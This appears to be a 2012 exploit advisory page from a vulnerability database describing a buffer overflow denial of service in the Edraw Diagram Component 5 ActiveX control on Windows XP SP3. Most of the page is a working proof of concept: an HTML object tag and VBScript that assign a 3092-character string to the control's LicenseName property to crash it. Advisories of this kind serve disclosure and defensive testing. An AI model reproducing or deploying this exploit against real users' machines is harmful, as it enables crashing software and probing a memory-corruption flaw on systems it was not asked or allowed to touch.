Edraw Diagram Component 5 ActiveX buffer overflow DoS

2012.02.05
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

Author : Senator of Pirates This exploit tested on Windows Xp SP3 EN http://www.edrawsoft.com/download/EDBoardSetup.exe -------------------------------------------------------------------------------------------------------- <object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\edboard\EDBoard.ocx" prototype = "Invoke_Unknown LicenseName As String" memberName = "LicenseName" progid = "EDBoardLib.EDBoard" argCount = 1 arg1=String(3092, "A") target.LicenseName = arg1 </script>

References:

http://www.edrawsoft.com/download/EDBoardSetup.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top